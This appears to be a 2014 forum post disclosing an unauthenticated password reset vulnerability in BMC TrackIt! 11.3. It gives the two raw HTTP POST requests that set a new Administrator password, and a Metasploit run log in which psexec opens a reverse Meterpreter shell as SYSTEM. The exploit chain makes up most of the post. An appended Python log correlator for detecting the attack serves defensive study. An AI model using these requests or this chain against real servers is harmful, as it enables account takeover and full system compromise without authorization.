Aerosol Posted December 12, 2014

BMC TrackIt! 11.3 Unauthenticated Local User Password Change

Trial available here: http://www.trackit.com

A Metasploit pull request has been made here: https://github.com/rapid7/metasploit-framework/pull/4359

BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated user to change any local user's password, such as Administrator. If the ability to log in remotely via SMB is enabled on the server, this can yield an unauthenticated user a shell as SYSTEM using the psexec module in Metasploit. This was tested against Windows Server 2008 R2 in a relatively default (trackit installs SQL server) installation. A domain was set up and the web server was added to the domain. Domain credentials were not able to be set, only local users.

Using the Registration link in the top right of the /PasswordReset/Application/Main page, the UI requires the user's password to continue. However, the request made afterwards to actually register the local user is disparate from the authentication request and can be sent independently. This allows an unauthenticated user to now reset that user's password.
Because the Password Reset form makes a separate, distinct request to check the answers to the secret question, the request to actually change a user's password can be made as any user.

The first request looks like:

POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%40fdsafdsa.com&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not

A valid ASP.NET_SessionId is required; one is obtained with a GET to /PasswordReset/, and the value from the subsequent Set-Cookie header is then used as the cookie in all subsequent requests. The domainname parameter can be the name of the computer, which is the default value on the registration page. The userName parameter is the user to register with the application.
You can attempt this with a user already registered with no issue (though changing the secret answers to known values is probably bad too).

The second request looks like this:

POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true

The domain and UserName parameters should match those supplied in the previous registration request. The newPassword parameter will need to meet any local standard enforced by GPO.

Combining these two requests will allow an unauthorised user to register a local user to be eligible for a password reset via the password reset form, then take advantage of the subsequent password reset vulnerability to change the password of any local user, including Administrator.

Supplied is a Metasploit auxiliary module which will change the password of the Administrator user by default, then print the domain, username, and password to use with psexec in order to log in over SMB.

The below Metasploit run details changing the password with the attached module. Setting the password to the one reported by the auxiliary module, psexec is run again and a shell as NT USER/SYSTEM is gained.

msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user. By default the local user's computer name will be autodetected
   LOCALUSER  Administrator    yes       The local user to change password for
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.57     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to BMC TrackIt
   VHOST                       no        HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec
msf exploit(psexec) >
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668) at 2014-10-12 00:44:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
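As an added defender-side example, not part of the advisory or the Metasploit module: a small Python correlator over IIS W3C log lines (a constructed sample; the field order is assumed) that flags the two-request chain described above, a successful POST to /PasswordReset/Application/Register followed shortly by a POST to /PasswordReset/Application/ResetPassword from the same client. The five-minute window is an assumed heuristic, and since IIS logs record neither POST bodies nor cookies, the targeted user name is not visible here.

```python
from datetime import datetime, timedelta

# Constructed IIS W3C Extended log sample (not from the advisory).
# Assumed field order: date time cs-method cs-uri-stem c-ip sc-status
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2014-12-12 00:43:50 GET /PasswordReset/ 192.168.1.31 200
2014-12-12 00:43:51 POST /PasswordReset/Application/Register 192.168.1.31 200
2014-12-12 00:43:52 POST /PasswordReset/Application/ResetPassword 192.168.1.31 200
2014-12-12 09:10:00 GET /PasswordReset/Application/Main 10.0.0.5 200
2014-12-12 09:10:40 POST /PasswordReset/Application/Register 10.0.0.5 200
2014-12-12 11:30:00 GET /PasswordReset/Application/Main 10.0.0.5 200
2014-12-12 11:30:25 POST /PasswordReset/Application/ResetPassword 10.0.0.5 200
"""

REGISTER_URI = "/passwordreset/application/register"
RESET_URI = "/passwordreset/application/resetpassword"


def parse_w3c(text):
    """Yield (timestamp, method, uri, client_ip, status) per data line; skip '#' directives."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, method, uri, ip, status = line.split()
        ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
        yield ts, method, uri, ip, int(status)


def find_reset_chains(text, window=timedelta(minutes=5)):
    """Return (client_ip, register_time, reset_time) for every successful ResetPassword
    POST preceded, within `window`, by a successful Register POST from the same client.
    A legitimate reset does not normally register the user seconds beforehand."""
    last_register = {}  # client_ip -> timestamp of its most recent Register POST
    hits = []
    for ts, method, uri, ip, status in parse_w3c(text):
        if method != "POST" or status != 200:
            continue
        if uri.lower() == REGISTER_URI:
            last_register[ip] = ts
        elif uri.lower() == RESET_URI:
            reg = last_register.get(ip)
            if reg is not None and ts - reg <= window:
                hits.append((ip, reg, ts))
    return hits


if __name__ == "__main__":
    for ip, reg, rst in find_reset_chains(SAMPLE_LOG):
        print(f"suspicious Register->ResetPassword chain from {ip}: {reg} -> {rst}")
```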